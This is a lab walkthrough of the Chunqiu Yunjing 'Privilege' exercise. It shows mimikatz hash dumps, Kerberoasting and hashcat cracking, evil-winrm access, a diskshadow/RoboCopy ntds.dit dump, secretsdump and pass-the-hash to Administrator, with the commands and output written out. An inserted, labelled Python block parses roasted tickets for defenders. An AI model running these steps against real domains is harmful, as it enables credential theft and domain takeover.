* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 34207 (00000000:0000859f)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2024/3/6 19:11:07
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 33059 (00000000:00008123)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/3/6 19:11:06
SID :
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XR-0923$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/3/6 19:11:06
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-0923$
* Domain : XIAORANG.LAB
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Using the NTLM hash of the XR-0923$ machine account to gather information, we can find a user named tianjing:

proxychains4 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':3eee7b38a7eeb8b5c4bc080c71fa8916' -dc-ip 172.22.14.11

Request a service ticket for this user and grab its hash:

proxychains4 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':3eee7b38a7eeb8b5c4bc080c71fa8916' -dc-ip 172.22.14.11 -request-user tianjing

┌──(czp㉿kali)-[~/桌面/impacket-master/examples]
└─$ proxychains4 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':3eee7b38a7eeb8b5c4bc080c71fa8916' -dc-ip 172.22.14.11 -request-user tianjing
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain ... 8.130.35.148:6000 ... 172.22.14.11:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------- -------- -------------------------------------------------------- -------------------------- --------- ----------
TERMSERV/xr-0923.xiaorang.lab tianjing CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab 2023-05-30 18:25:11.564883 <never>
WWW/xr-0923.xiaorang.lab/IIS tianjing CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab 2023-05-30 18:25:11.564883 <never>



[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 8.130.35.148:6000 ... 172.22.14.11:88 ... OK
[proxychains] Strict chain ... 8.130.35.148:6000 ... 172.22.14.11:88 ... OK
[proxychains] Strict chain ... 8.130.35.148:6000 ... 172.22.14.11:88 ... OK
$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$19790f062eb3278e0a5d04d9390de323$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

Save the hash to 1.txt and crack it with hashcat:

hashcat -m 13100 -a 0 1.txt rockyou.txt --force
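Why `-m 13100` is the right mode, and what a defender can read off such a line before any cracking happens, is easiest to see by parsing it. The following Python is an added example written for this walkthrough; it is not part of the original post, impacket or hashcat. It splits hashcat-style `$krb5tgs$` lines into user, realm, SPN and encryption type, maps the etype to the hashcat mode, and flags RC4 (etype 23) tickets: their key is the unsalted NT hash of the service account's password, so offline guessing is cheap, whereas AES keys (etype 17/18) are PBKDF2-derived and far slower to attack. The etype 23 layout is the one shown on this page; the etype 17/18 layout with `*spn*` is assumed to be what impacket's GetUserSPNs.py writes. The sample lines use dummy hex and a constructed `svc_sql` account, not real ticket material.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# hashcat modes for Kerberos 5 TGS-REP, keyed by ticket encryption type (etype)
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}
ETYPE_NAMES = {23: "RC4-HMAC", 17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96"}

# etype 23 layout (the one on this page): $krb5tgs$23$*user$REALM$spn*$checksum$edata2
# checksum is HMAC-MD5, 16 bytes = 32 hex chars
_RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
# etype 17/18 layout as impacket's GetUserSPNs.py writes it (assumption):
# $krb5tgs$18$user$REALM$*spn*$checksum$edata2, checksum HMAC-SHA1-96 = 12 bytes = 24 hex chars
_AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{24})\$(?P<edata>[0-9a-fA-F]+)$"
)


@dataclass
class RoastedTicket:
    user: str
    realm: str
    spn: str
    etype: int
    hashcat_mode: int
    weak_crypto: bool  # True for RC4: key is the unsalted NT hash, so offline guessing is cheap


def parse_krb5tgs(line: str) -> RoastedTicket:
    """Parse one hashcat-style $krb5tgs$ line; raise ValueError on anything else."""
    line = line.strip()
    m = _RC4_RE.match(line)
    etype = 23
    if m is None:
        m = _AES_RE.match(line)
        if m is None:
            raise ValueError("not a recognised $krb5tgs$ line")
        etype = int(m.group("etype"))
    return RoastedTicket(
        user=m.group("user"),
        realm=m.group("realm"),
        spn=m.group("spn"),
        etype=etype,
        hashcat_mode=HASHCAT_MODES[etype],
        weak_crypto=(etype == 23),
    )


def triage(lines: List[str]) -> Tuple[List[RoastedTicket], List[str]]:
    """Parse every non-empty line; also return the accounts still issued RC4 tickets."""
    tickets = [parse_krb5tgs(ln) for ln in lines if ln.strip()]
    rc4_accounts = sorted({t.user for t in tickets if t.weak_crypto})
    return tickets, rc4_accounts


# Constructed sample lines: dummy hex, not real ticket material.
SAMPLE_LINES = [
    "$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$" + "ab" * 16 + "$" + "cd" * 48,
    # constructed AES-only service account, for contrast
    "$krb5tgs$18$svc_sql$XIAORANG.LAB$*MSSQLSvc/db.xiaorang.lab*$" + "12" * 12 + "$" + "34" * 48,
]

if __name__ == "__main__":
    tickets, rc4 = triage(SAMPLE_LINES)
    for t in tickets:
        print(f"{t.user}@{t.realm} spn={t.spn} etype={t.etype} ({ETYPE_NAMES[t.etype]}) "
              f"hashcat -m {t.hashcat_mode} weak={t.weak_crypto}")
    print("accounts still on RC4:", rc4)
```

The `rc4_accounts` list is the actionable output for the domain owner: every account on it has an SPN and still gets RC4 tickets, so it needs a long random password (or a gMSA) and AES-only `msDS-SupportedEncryptionTypes`, after which the same request would yield an etype 18 line and mode 19700, which rockyou-style wordlist runs do not get through.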

tianjing:DPQSXSXgh2

Log in with evil-winrm using the cracked password:

proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2

This account holds the SeBackupPrivilege and SeRestorePrivilege privileges.

Export the SAM and SYSTEM hives directly:

reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

Then use diskshadow to dump ntds.dit by way of a volume shadow copy.

First, on Kali, write the following into 2.txt:

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "C:\windows\system32\cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\Users\tianjing\ntds.dit
delete shadows volume %someAlias%
reset

Then convert the line endings with unix2dos 2.txt, switch to the C: drive, create a temp folder and upload the file there; otherwise diskshadow may fail to run it.

Without this, the later steps will not execute successfully.

Run the commands in 2.txt with diskshadow:

diskshadow /s 2.txt

Here the script reports access denied when it reaches the copy step:

diskshadow.exe : 拒绝访问。
+ CategoryInfo : NotSpecified: (拒绝访问。:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError

Instead, copy it manually to the current directory with RoboCopy:

RoboCopy /b z:\windows\ntds . ntds.dit

Download it, together with the SYSTEM and SAM hives saved earlier:

download C:\temp\ntds.dit ntds.dit
download C:\temp\sam.hive sam.hive
download C:\temp\system.hive system.hive

Decrypt locally using ntds.dit and the SYSTEM hive:

python secretsdump.py -system system.hive -ntds ntds.dit local

With the hash in hand, pass-the-hash:

proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"

base


春秋云境-Privilege
https://www.supersmallblack.cn/春秋云境-Privilege.html
Author: Small Black
Published: March 6, 2024